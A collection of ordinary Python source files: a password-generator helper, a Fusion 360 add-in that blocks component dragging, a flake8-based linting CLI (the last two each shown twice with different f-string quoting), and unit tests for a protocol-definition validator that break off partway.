print(f'{width * "-"}+{"-" * 14}+{"-" * 20}') [print(f'{user:<{width}}| {password} | {_escape_password(password)}') for user, password in passwords.items()] def _generate_password(): """ Generate a random 12 character password. Password contains lower-case, upper-case, numbers and special characters. Based on best-practice recipe from https://docs.python.org/3/library/secrets.html. """ alphabet = string.ascii_letters + string.digits + string.punctuation while True: password = ''.join(secrets.choice(alphabet) for _ in range(12)) if (any(c.islower() for c in password) and any(c.isupper() for c in password) and sum(c.isdigit() for c in password) >= 3 and any(c in string.punctuation for c in password)): return password def _escape_password(password): return yaml.dump(password, default_style='"').strip()
#Author-Thomas Axelsson, ZXYNINE #Description-Blocks Component Dragging in parametric mode # This file is part of NoComponentDrag, a Fusion 360 add-in for blocking # component drags. # # Copyright (c) 2020 Thomas Axelsson # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import adsk.core, adsk.fusion, adsk.cam, traceback import math, os, operator, time from collections import deque NAME = 'NoComponentDrag' FILE_DIR = os.path.dirname(os.path.realpath(__file__)) # Import relative path to avoid namespace pollution from .thomasa88lib import utils, events, manifest, error # Force modules to be fresh during development import importlib importlib.reload(thomasa88lib.utils) importlib.reload(thomasa88lib.events) importlib.reload(thomasa88lib.manifest) importlib.reload(thomasa88lib.error) ENABLE_CMD_ID = 'thomasa88_NoComponentDrag_Enable' DIRECT_EDIT_DRAG_CMD_ID = 'FusionDragCompControlsCmd' app_ = None ui_ = None error_catcher_ = thomasa88lib.error.ErrorCatcher() events_manager_ = thomasa88lib.events.EventsManager(error_catcher_) manifest_ = thomasa88lib.manifest.read() select_panel_ = None enable_cmd_def_ = None parametric_environment_ = True addin_updating_checkbox_ = False fusion_drag_controls_cmd_def_ = None def command_starting_handler(args: adsk.core.ApplicationCommandEventArgs): # Should we block? if parametric_environment_ and args.commandId == 'FusionDragComponentsCommand' and not get_direct_edit_drag_enabled(): args.isCanceled = True def command_terminated_handler(args: adsk.core.ApplicationCommandEventArgs): # Detect if user toggles Direct Edit or enters/leaves a Base Feature # Undo/Redo triggers the ActivateEnvironmentCommand instead. # PLM360OpenAttachmentCommand, CurrentlyOpenDocumentsCommand are workarounds for DocumentActivated with Drawings bug. # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750 if (args.commandId in ('ActivateEnvironmentCommand', 'PLM360OpenAttachmentCommand', 'CurrentlyOpenDocumentsCommand') or (args.terminationReason == adsk.core.CommandTerminationReason.CompletedTerminationReason and args.commandId in ('Undo', 'Redo','ConvertToPMDesignCommand', 'ConvertToDMDesignCommand', 'BaseFeatureActivate', 'BaseFeatureStop', 'BaseFeatureCreationCommand'))): check_environment() # This handler is called three times per window switch and only two times when first # starting and only once when trying to insert a derive. def document_activated_handler(args: adsk.core.WorkspaceEventArgs): check_environment() def enable_cmd_created_handler(args: adsk.core.CommandCreatedEventArgs): global addin_updating_checkbox_ # Check if we are updating the checkbox programmatically, to avoid infinite event recursion if addin_updating_checkbox_: return checkbox_def: adsk.core.CheckBoxControlDefinition = args.command.parentCommandDefinition.controlDefinition set_direct_edit_drag_enabled(checkbox_def.isChecked) def set_direct_edit_drag_enabled(value): '''Sets the Fusion's "Component Drag" checkbox to the given value''' fusion_drag_controls_cmd_def_.controlDefinition.isChecked = value def get_direct_edit_drag_enabled(): '''Gets the value of Fusion's "Component Drag" checkbox''' return fusion_drag_controls_cmd_def_.controlDefinition.isChecked def check_environment(): global enable_cmd_def_, parametric_environment_ is_parametric = is_parametric_mode() if parametric_environment_ == is_parametric: # Environment did not change return parametric_environment_ = is_parametric # Hide/show our menu command to avoid showing to Component Drag menu items # in direct edit mode (Our command + Fusion's command). enable_cmd_def_.controlDefinition.isVisible = is_parametric # We only need to update checkbox in parametric mode, as it will not be # seen in direct edit mode. if is_parametric and enable_cmd_def_.controlDefinition.isChecked != get_direct_edit_drag_enabled(): # Fusion crashes if we change isChecked from (one of?) the event handlers, # so we put the update at the end of the event queue. events_manager_.delay(update_checkbox) def update_checkbox(): global addin_updating_checkbox_ # Only set the checkbox value (triggering a command creation), if the # direct edit value has actually changed direct_edit_drag_ = get_direct_edit_drag_enabled() if enable_cmd_def_.controlDefinition.isChecked != direct_edit_drag_: addin_updating_checkbox_ = True enable_cmd_def_.controlDefinition.isChecked = direct_edit_drag_ addin_updating_checkbox_ = False def is_parametric_mode(): try: # UserInterface.ActiveWorkspace throws when it is called from DocumentActivatedHandler # during Fusion 360 start-up(?). Checking for app_.isStartupComplete does not help. if ui_.activeWorkspace.id == 'FusionSolidEnvironment': design = adsk.fusion.Design.cast(app_.activeProduct) if design and design.designType == adsk.fusion.DesignTypes.ParametricDesignType: return True except: pass return False def clear_ui_item(item): if item: item.deleteMe() def run(context): #Expose global variables inside of function global app_, ui_, enable_cmd_def_, select_panel_, fusion_drag_controls_cmd_def_ with error_catcher_: app_ = adsk.core.Application.get() ui_ = app_.userInterface fusion_drag_controls_cmd_def_ = ui_.commandDefinitions.itemById('FusionDragCompControlsCmd') # Clearing any previous enable_cmd_def clear_ui_item(ui_.commandDefinitions.itemById(ENABLE_CMD_ID)) # There are multiple select panels. Pick the right one select_panel_ = ui_.toolbarPanelsByProductType('DesignProductType').itemById('SelectPanel') enabled = get_direct_edit_drag_enabled() # Use a Command to get a transaction when renaming enable_cmd_def_ = ui_.commandDefinitions.addCheckBoxDefinition(ENABLE_CMD_ID, f'Component Drag', 'Enables or disables the movement of components by dragging ' 'in the canvas.\n\n' f'({NAME} v {manifest_['version']})\n', enabled) events_manager_.add_handler(enable_cmd_def_.commandCreated, callback=enable_cmd_created_handler) # Removing the old control clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID)) select_panel_.controls.addCommand(enable_cmd_def_, DIRECT_EDIT_DRAG_CMD_ID, False) events_manager_.add_handler(ui_.commandStarting, callback=command_starting_handler) events_manager_.add_handler(ui_.commandTerminated, callback=command_terminated_handler) # Fusion bug: DocumentActivated is not called when switching to/from Drawing. # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750 events_manager_.add_handler(app_.documentActivated, callback=document_activated_handler) # Workspace is not ready when starting (?) if app_.isStartupComplete: check_environment() # Checking workspace type in DocumentActivated handler fails since Fusion 360 v2.0.10032 # Put a check at the end of the event queue instead. events_manager_.delay(check_environment) def stop(context): with error_catcher_: events_manager_.clean_up() # Removing the old control clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID))
#Author-Thomas Axelsson, ZXYNINE #Description-Blocks Component Dragging in parametric mode # This file is part of NoComponentDrag, a Fusion 360 add-in for blocking # component drags. # # Copyright (c) 2020 Thomas Axelsson # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import adsk.core, adsk.fusion, adsk.cam, traceback import math, os, operator, time from collections import deque NAME = 'NoComponentDrag' FILE_DIR = os.path.dirname(os.path.realpath(__file__)) # Import relative path to avoid namespace pollution from .thomasa88lib import utils, events, manifest, error # Force modules to be fresh during development import importlib importlib.reload(thomasa88lib.utils) importlib.reload(thomasa88lib.events) importlib.reload(thomasa88lib.manifest) importlib.reload(thomasa88lib.error) ENABLE_CMD_ID = 'thomasa88_NoComponentDrag_Enable' DIRECT_EDIT_DRAG_CMD_ID = 'FusionDragCompControlsCmd' app_ = None ui_ = None error_catcher_ = thomasa88lib.error.ErrorCatcher() events_manager_ = thomasa88lib.events.EventsManager(error_catcher_) manifest_ = thomasa88lib.manifest.read() select_panel_ = None enable_cmd_def_ = None parametric_environment_ = True addin_updating_checkbox_ = False fusion_drag_controls_cmd_def_ = None def command_starting_handler(args: adsk.core.ApplicationCommandEventArgs): # Should we block? if parametric_environment_ and args.commandId == 'FusionDragComponentsCommand' and not get_direct_edit_drag_enabled(): args.isCanceled = True def command_terminated_handler(args: adsk.core.ApplicationCommandEventArgs): # Detect if user toggles Direct Edit or enters/leaves a Base Feature # Undo/Redo triggers the ActivateEnvironmentCommand instead. # PLM360OpenAttachmentCommand, CurrentlyOpenDocumentsCommand are workarounds for DocumentActivated with Drawings bug. # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750 if (args.commandId in ('ActivateEnvironmentCommand', 'PLM360OpenAttachmentCommand', 'CurrentlyOpenDocumentsCommand') or (args.terminationReason == adsk.core.CommandTerminationReason.CompletedTerminationReason and args.commandId in ('Undo', 'Redo','ConvertToPMDesignCommand', 'ConvertToDMDesignCommand', 'BaseFeatureActivate', 'BaseFeatureStop', 'BaseFeatureCreationCommand'))): check_environment() # This handler is called three times per window switch and only two times when first # starting and only once when trying to insert a derive. def document_activated_handler(args: adsk.core.WorkspaceEventArgs): check_environment() def enable_cmd_created_handler(args: adsk.core.CommandCreatedEventArgs): global addin_updating_checkbox_ # Check if we are updating the checkbox programmatically, to avoid infinite event recursion if addin_updating_checkbox_: return checkbox_def: adsk.core.CheckBoxControlDefinition = args.command.parentCommandDefinition.controlDefinition set_direct_edit_drag_enabled(checkbox_def.isChecked) def set_direct_edit_drag_enabled(value): '''Sets the Fusion's "Component Drag" checkbox to the given value''' fusion_drag_controls_cmd_def_.controlDefinition.isChecked = value def get_direct_edit_drag_enabled(): '''Gets the value of Fusion's "Component Drag" checkbox''' return fusion_drag_controls_cmd_def_.controlDefinition.isChecked def check_environment(): global enable_cmd_def_, parametric_environment_ is_parametric = is_parametric_mode() if parametric_environment_ == is_parametric: # Environment did not change return parametric_environment_ = is_parametric # Hide/show our menu command to avoid showing to Component Drag menu items # in direct edit mode (Our command + Fusion's command). enable_cmd_def_.controlDefinition.isVisible = is_parametric # We only need to update checkbox in parametric mode, as it will not be # seen in direct edit mode. if is_parametric and enable_cmd_def_.controlDefinition.isChecked != get_direct_edit_drag_enabled(): # Fusion crashes if we change isChecked from (one of?) the event handlers, # so we put the update at the end of the event queue. events_manager_.delay(update_checkbox) def update_checkbox(): global addin_updating_checkbox_ # Only set the checkbox value (triggering a command creation), if the # direct edit value has actually changed direct_edit_drag_ = get_direct_edit_drag_enabled() if enable_cmd_def_.controlDefinition.isChecked != direct_edit_drag_: addin_updating_checkbox_ = True enable_cmd_def_.controlDefinition.isChecked = direct_edit_drag_ addin_updating_checkbox_ = False def is_parametric_mode(): try: # UserInterface.ActiveWorkspace throws when it is called from DocumentActivatedHandler # during Fusion 360 start-up(?). Checking for app_.isStartupComplete does not help. if ui_.activeWorkspace.id == 'FusionSolidEnvironment': design = adsk.fusion.Design.cast(app_.activeProduct) if design and design.designType == adsk.fusion.DesignTypes.ParametricDesignType: return True except: pass return False def clear_ui_item(item): if item: item.deleteMe() def run(context): #Expose global variables inside of function global app_, ui_, enable_cmd_def_, select_panel_, fusion_drag_controls_cmd_def_ with error_catcher_: app_ = adsk.core.Application.get() ui_ = app_.userInterface fusion_drag_controls_cmd_def_ = ui_.commandDefinitions.itemById('FusionDragCompControlsCmd') # Clearing any previous enable_cmd_def clear_ui_item(ui_.commandDefinitions.itemById(ENABLE_CMD_ID)) # There are multiple select panels. Pick the right one select_panel_ = ui_.toolbarPanelsByProductType('DesignProductType').itemById('SelectPanel') enabled = get_direct_edit_drag_enabled() # Use a Command to get a transaction when renaming enable_cmd_def_ = ui_.commandDefinitions.addCheckBoxDefinition(ENABLE_CMD_ID, f'Component Drag', 'Enables or disables the movement of components by dragging ' 'in the canvas.\n\n' f'({NAME} v {manifest_["version"]})\n', enabled) events_manager_.add_handler(enable_cmd_def_.commandCreated, callback=enable_cmd_created_handler) # Removing the old control clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID)) select_panel_.controls.addCommand(enable_cmd_def_, DIRECT_EDIT_DRAG_CMD_ID, False) events_manager_.add_handler(ui_.commandStarting, callback=command_starting_handler) events_manager_.add_handler(ui_.commandTerminated, callback=command_terminated_handler) # Fusion bug: DocumentActivated is not called when switching to/from Drawing. # https://forums.autodesk.com/t5/fusion-360-api-and-scripts/api-bug-application-documentactivated-event-do-not-raise/m-p/9020750 events_manager_.add_handler(app_.documentActivated, callback=document_activated_handler) # Workspace is not ready when starting (?) if app_.isStartupComplete: check_environment() # Checking workspace type in DocumentActivated handler fails since Fusion 360 v2.0.10032 # Put a check at the end of the event queue instead. events_manager_.delay(check_environment) def stop(context): with error_catcher_: events_manager_.clean_up() # Removing the old control clear_ui_item(select_panel_.controls.itemById(ENABLE_CMD_ID))
import contextlib from io import StringIO import logging import pathlib import click import flake8.main.application import toml from ni_python_styleguide import _acknowledge_existing_errors def _qs_or_vs(verbosity): if verbosity != 0: return f"-{"v" * verbosity if verbosity > 0 else "q" * abs(verbosity)}" return "" def _read_pyproject_toml(ctx, param, value): value = value or "pyproject.toml" # Only accept local pyproject.toml if not specified try: pyproject_data = toml.load(value) except FileNotFoundError: return None except (toml.TomlDecodeError, OSError) as e: raise click.FileError(filename=value, hint=f"Error reading configuration file: {e}") ctx.ensure_object(dict) ctx.obj["PYPROJECT"] = pyproject_data config = pyproject_data.get("tool", {}).get("ni-python-styleguide", {}) config.pop("quiet", None) config.pop("verbose", None) if ctx.default_map is None: ctx.default_map = {} ctx.default_map.update(config) return value def _get_application_import_names(pyproject): """Return the application package name the config.""" # Otherwise override with what was specified app_name = ( pyproject.get("tool", {}) .get("ni-python-styleguide", {}) .get("application-import-names", "") ) # Allow the poetry name as a fallback if not app_name: app_name = pyproject.get("tool", {}).get("poetry", {}).get("name", "").replace("-", "_") return f"{app_name},tests" class ConfigGroup(click.Group): """click.Group subclass which allows for a config option to load options from.""" def __init__(self, *args, **kwargs): """Construct the click.Group with the config option.""" kwargs["params"].append( click.Option( ["--config"], type=click.Path( exists=True, file_okay=True, dir_okay=False, readable=True, allow_dash=False, path_type=str, ), is_eager=True, callback=_read_pyproject_toml, help="Config file to load configurable options from", ) ) super().__init__(*args, **kwargs) @click.group(cls=ConfigGroup) @click.option( "-v", "--verbose", count=True, help="Print more information. Repeat to increase verbosity.", ) @click.option( "-q", "--quiet", count=True, help="Print less information. Repeat to decrease verbosity.", ) @click.option( "--exclude", type=str, show_default=True, default="__pycache__,.git,.venv", help="Comma-separated list of files or directories to exclude.", ) @click.option( "--extend-exclude", type=str, default="", help="Comma-separated list of files or directories to exclude (in addition to --exclude).", ) @click.version_option() # @TODO: override the message to include dependency version(s) @click.pass_context def main(ctx, verbose, quiet, config, exclude, extend_exclude): """NI's internal and external Python linter rules and plugins.""" # noqa: D4 ctx.ensure_object(dict) ctx.obj["VERBOSITY"] = verbose - quiet ctx.obj["EXCLUDE"] = ",".join(filter(bool, [exclude.strip(","), extend_exclude.strip(",")])) ctx.obj["APP_IMPORT_NAMES"] = _get_application_import_names(ctx.obj.get("PYPROJECT", {})) def _lint(obj, format, extend_ignore, file_or_dir): app = flake8.main.application.Application() args = [ _qs_or_vs(obj["VERBOSITY"]), f"--config={(pathlib.Path(__file__).parent / "config.ini").resolve()}", f"--exclude={obj["EXCLUDE"]}" if obj["EXCLUDE"] else "", f"--format={format}" if format else "", f"--extend-ignore={extend_ignore}" if extend_ignore else "", # The only way to configure flake8-black's line length is through a pyproject.toml's # [tool.black] setting (which makes sense if you think about it) # So we need to give it one f"--black-config={(pathlib.Path(__file__).parent / "config.toml").resolve()}", f"--application-import-names={obj["APP_IMPORT_NAMES"]}", *file_or_dir, ] app.run(list(filter(bool, args))) app.exit() @main.command() # @TODO: When we're ready to encourage editor integration, add --diff flag @click.option("--format", type=str, help="Format errors according to the chosen formatter.") @click.option( "--extend-ignore", type=str, help="Comma-separated list of errors and warnings to ignore (or skip)", ) @click.argument("file_or_dir", nargs=-1) @click.pass_obj def lint(obj, format, extend_ignore, file_or_dir): """Lint the file(s)/directory(s) given.""" # noqa: D4 _lint(obj=obj, format=format, extend_ignore=extend_ignore, file_or_dir=file_or_dir) @main.command() @click.option( "--extend-ignore", type=str, help="Comma-separated list of errors and warnings to ignore (or skip)", ) @click.argument("file_or_dir", nargs=-1) @click.pass_obj def acknowledge_existing_violations(obj, extend_ignore, file_or_dir): """Lint existing error and suppress. Use this command to acknowledge violations in existing code to allow for enforcing new code. """ logging.info("linting code") capture = StringIO() with contextlib.redirect_stdout(capture): try: _lint(obj=obj, format=None, extend_ignore=extend_ignore, file_or_dir=file_or_dir) except SystemExit: pass # the flake8 app wants to always SystemExit :( lines = capture.getvalue().splitlines() _acknowledge_existing_errors.acknowledge_lint_errors(lines)
import contextlib from io import StringIO import logging import pathlib import click import flake8.main.application import toml from ni_python_styleguide import _acknowledge_existing_errors def _qs_or_vs(verbosity): if verbosity != 0: return f"-{'v' * verbosity if verbosity > 0 else 'q' * abs(verbosity)}" return "" def _read_pyproject_toml(ctx, param, value): value = value or "pyproject.toml" # Only accept local pyproject.toml if not specified try: pyproject_data = toml.load(value) except FileNotFoundError: return None except (toml.TomlDecodeError, OSError) as e: raise click.FileError(filename=value, hint=f"Error reading configuration file: {e}") ctx.ensure_object(dict) ctx.obj["PYPROJECT"] = pyproject_data config = pyproject_data.get("tool", {}).get("ni-python-styleguide", {}) config.pop("quiet", None) config.pop("verbose", None) if ctx.default_map is None: ctx.default_map = {} ctx.default_map.update(config) return value def _get_application_import_names(pyproject): """Return the application package name the config.""" # Otherwise override with what was specified app_name = ( pyproject.get("tool", {}) .get("ni-python-styleguide", {}) .get("application-import-names", "") ) # Allow the poetry name as a fallback if not app_name: app_name = pyproject.get("tool", {}).get("poetry", {}).get("name", "").replace("-", "_") return f"{app_name},tests" class ConfigGroup(click.Group): """click.Group subclass which allows for a config option to load options from.""" def __init__(self, *args, **kwargs): """Construct the click.Group with the config option.""" kwargs["params"].append( click.Option( ["--config"], type=click.Path( exists=True, file_okay=True, dir_okay=False, readable=True, allow_dash=False, path_type=str, ), is_eager=True, callback=_read_pyproject_toml, help="Config file to load configurable options from", ) ) super().__init__(*args, **kwargs) @click.group(cls=ConfigGroup) @click.option( "-v", "--verbose", count=True, help="Print more information. Repeat to increase verbosity.", ) @click.option( "-q", "--quiet", count=True, help="Print less information. Repeat to decrease verbosity.", ) @click.option( "--exclude", type=str, show_default=True, default="__pycache__,.git,.venv", help="Comma-separated list of files or directories to exclude.", ) @click.option( "--extend-exclude", type=str, default="", help="Comma-separated list of files or directories to exclude (in addition to --exclude).", ) @click.version_option() # @TODO: override the message to include dependency version(s) @click.pass_context def main(ctx, verbose, quiet, config, exclude, extend_exclude): """NI's internal and external Python linter rules and plugins.""" # noqa: D4 ctx.ensure_object(dict) ctx.obj["VERBOSITY"] = verbose - quiet ctx.obj["EXCLUDE"] = ",".join(filter(bool, [exclude.strip(","), extend_exclude.strip(",")])) ctx.obj["APP_IMPORT_NAMES"] = _get_application_import_names(ctx.obj.get("PYPROJECT", {})) def _lint(obj, format, extend_ignore, file_or_dir): app = flake8.main.application.Application() args = [ _qs_or_vs(obj["VERBOSITY"]), f"--config={(pathlib.Path(__file__).parent / 'config.ini').resolve()}", f"--exclude={obj['EXCLUDE']}" if obj["EXCLUDE"] else "", f"--format={format}" if format else "", f"--extend-ignore={extend_ignore}" if extend_ignore else "", # The only way to configure flake8-black's line length is through a pyproject.toml's # [tool.black] setting (which makes sense if you think about it) # So we need to give it one f"--black-config={(pathlib.Path(__file__).parent / 'config.toml').resolve()}", f"--application-import-names={obj['APP_IMPORT_NAMES']}", *file_or_dir, ] app.run(list(filter(bool, args))) app.exit() @main.command() # @TODO: When we're ready to encourage editor integration, add --diff flag @click.option("--format", type=str, help="Format errors according to the chosen formatter.") @click.option( "--extend-ignore", type=str, help="Comma-separated list of errors and warnings to ignore (or skip)", ) @click.argument("file_or_dir", nargs=-1) @click.pass_obj def lint(obj, format, extend_ignore, file_or_dir): """Lint the file(s)/directory(s) given.""" # noqa: D4 _lint(obj=obj, format=format, extend_ignore=extend_ignore, file_or_dir=file_or_dir) @main.command() @click.option( "--extend-ignore", type=str, help="Comma-separated list of errors and warnings to ignore (or skip)", ) @click.argument("file_or_dir", nargs=-1) @click.pass_obj def acknowledge_existing_violations(obj, extend_ignore, file_or_dir): """Lint existing error and suppress. Use this command to acknowledge violations in existing code to allow for enforcing new code. """ logging.info("linting code") capture = StringIO() with contextlib.redirect_stdout(capture): try: _lint(obj=obj, format=None, extend_ignore=extend_ignore, file_or_dir=file_or_dir) except SystemExit: pass # the flake8 app wants to always SystemExit :( lines = capture.getvalue().splitlines() _acknowledge_existing_errors.acknowledge_lint_errors(lines)
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2022 Valory AG # Copyright 2018-2020 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """This module contains the tests for generator/validate.py module.""" import logging from unittest import TestCase, mock from aea.configurations.base import CRUDCollection, SpeechActContentConfig from aea.protocols.generator.validate import ( CONTENT_NAME_REGEX_PATTERN, END_STATE_REGEX_PATTERN, PERFORMATIVE_REGEX_PATTERN, ROLE_REGEX_PATTERN, _has_brackets, _is_reserved_name, _is_valid_content_type_format, _is_valid_ct, _is_valid_dict, _is_valid_list, _is_valid_optional, _is_valid_pt, _is_valid_regex, _is_valid_set, _is_valid_union, _validate_content_name, _validate_content_type, _validate_dialogue_section, _validate_end_states, _validate_field_existence, _validate_initiation, _validate_keep_terminal, _validate_performatives, _validate_protocol_buffer_schema_code_snippets, _validate_reply, _validate_roles, _validate_speech_acts_section, _validate_termination, validate, ) logger = logging.getLogger("aea") logging.basicConfig(level=logging.INFO) class TestValidate(TestCase): """Test for generator/validate.py.""" def test_is_reserved_name(self): """Test for the '_is_reserved_name' method.""" invalid_content_name_1 = "_body" assert _is_reserved_name(invalid_content_name_1) is True invalid_content_name_2 = "message_id" assert _is_reserved_name(invalid_content_name_2) is True invalid_content_name_3 = "dialogue_reference" assert _is_reserved_name(invalid_content_name_3) is True invalid_content_name_4 = "target" assert _is_reserved_name(invalid_content_name_4) is True invalid_content_name_5 = "performative" assert _is_reserved_name(invalid_content_name_5) is True valid_content_nam_1 = "content_name" assert _is_reserved_name(valid_content_nam_1) is False valid_content_name_2 = "query" assert _is_reserved_name(valid_content_name_2) is False valid_content_name_3 = "ThiSiSAConTEnT234" assert _is_reserved_name(valid_content_name_3) is False def test_is_valid_regex(self): """Test for the '_is_valid_regex' method.""" regex_1 = "^[0-9][a-zA-Z0-9]*[A-Z]$" valid_text_1 = "53453hKb35nDkG" assert _is_valid_regex(regex_1, valid_text_1) is True invalid_text_1 = "hKbnDkG" assert _is_valid_regex(regex_1, invalid_text_1) is False invalid_text_2 = "4f nkG" assert _is_valid_regex(regex_1, invalid_text_2) is False def test_has_brackets(self): """Test for the '_has_brackets' method.""" valid_content_type_1 = "pt:set[pt:int]" assert _has_brackets(valid_content_type_1) is True valid_content_type_2 = "pt:union[hskdjf-8768&^${]hsdkjhfk]" assert _has_brackets(valid_content_type_2) is True valid_content_type_3 = "pt:optional[[]]" assert _has_brackets(valid_content_type_3) is True ################################################### invalid_content_type_1 = "ct:set[pt:int]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_1) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_2 = "pt:tuple[pt:float]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_2) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) invalid_content_type_3 = "pt:optinal[pt:bool]" with self.assertRaises(SyntaxError) as cm: _has_brackets(invalid_content_type_3) self.assertEqual( str(cm.exception), "Content type must be a compositional type!" ) ################################################### invalid_content_type_4 = "pt:optional{}" assert _has_brackets(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[]7657" assert _has_brackets(invalid_content_type_5) is False invalid_content_type_6 = "pt:union [pt:int, pt:bool]" assert _has_brackets(invalid_content_type_6) is False invalid_content_type_7 = "pt:dict[pt:int, pt:bool] " assert _has_brackets(invalid_content_type_7) is False def test_is_valid_ct(self): """Test for the '_is_valid_ct' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_ct(valid_content_type_1) is True valid_content_type_2 = "ct:ThisIsACustomContent" assert _is_valid_ct(valid_content_type_2) is True valid_content_type_3 = "ct:Query" assert _is_valid_ct(valid_content_type_3) is True valid_content_type_4 = " ct:Proposal " assert _is_valid_ct(valid_content_type_4) is True valid_content_type_5 = "ct:DSA" assert _is_valid_ct(valid_content_type_5) is True valid_content_type_6 = "ct:DataF" assert _is_valid_ct(valid_content_type_6) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_ct(invalid_content_type_1) is False invalid_content_type_2 = "Model" assert _is_valid_ct(invalid_content_type_2) is False invalid_content_type_3 = "ct: DataModel" assert _is_valid_ct(invalid_content_type_3) is False invalid_content_type_4 = "ct:E3" assert _is_valid_ct(invalid_content_type_4) is False def test_is_valid_pt(self): """Test for the '_is_valid_pt' method.""" valid_content_type_1 = "pt:bytes" assert _is_valid_pt(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_pt(valid_content_type_2) is True valid_content_type_3 = "pt:float" assert _is_valid_pt(valid_content_type_3) is True valid_content_type_4 = "pt:bool" assert _is_valid_pt(valid_content_type_4) is True valid_content_type_5 = "pt:str" assert _is_valid_pt(valid_content_type_5) is True valid_content_type_6 = " pt:int " assert _is_valid_pt(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:integer" assert _is_valid_pt(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_pt(invalid_content_type_2) is False invalid_content_type_3 = "pt: str" assert _is_valid_pt(invalid_content_type_3) is False invalid_content_type_4 = "pt;float" assert _is_valid_pt(invalid_content_type_4) is False def test_is_valid_set(self): """Test for the '_is_valid_set' method.""" valid_content_type_1 = "pt:set[pt:bytes]" assert _is_valid_set(valid_content_type_1) is True valid_content_type_2 = "pt:set[pt:int]" assert _is_valid_set(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_set(valid_content_type_3) is True valid_content_type_4 = "pt:set[pt:bool]" assert _is_valid_set(valid_content_type_4) is True valid_content_type_5 = "pt:set[pt:str]" assert _is_valid_set(valid_content_type_5) is True valid_content_type_6 = " pt:set[ pt:int ] " assert _is_valid_set(valid_content_type_6) is True ################################################### invalid_content_type_1 = "pt:frozenset[pt:int]" assert _is_valid_set(invalid_content_type_1) is False invalid_content_type_2 = "set[pt:int]" assert _is_valid_set(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_set(invalid_content_type_3) is False invalid_content_type_4 = "pt:set[integer]" assert _is_valid_set(invalid_content_type_4) is False invalid_content_type_5 = "pt:set[int]" assert _is_valid_set(invalid_content_type_5) is False invalid_content_type_6 = "pt:set{int]" assert _is_valid_set(invalid_content_type_6) is False invalid_content_type_7 = "pt:set[pt:int, pt:str]" assert _is_valid_set(invalid_content_type_7) is False invalid_content_type_8 = "pt:set[]" assert _is_valid_set(invalid_content_type_8) is False invalid_content_type_9 = "pt:set[pt:list[pt:int, pt:list[pt:bool]]" assert _is_valid_set(invalid_content_type_9) is False invalid_content_type_10 = "pt:set" assert _is_valid_set(invalid_content_type_10) is False def test_is_valid_list(self): """Test for the '_is_valid_list' method.""" valid_content_type_1 = "pt:list[pt:bytes]" assert _is_valid_list(valid_content_type_1) is True valid_content_type_2 = "pt:list[pt:int]" assert _is_valid_list(valid_content_type_2) is True valid_content_type_3 = "pt:list[pt:float]" assert _is_valid_list(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_list(valid_content_type_4) is True valid_content_type_5 = "pt:list[pt:str]" assert _is_valid_list(valid_content_type_5) is True valid_content_type_6 = " pt:list[ pt:bool ] " assert _is_valid_list(valid_content_type_6) is True ################################################### 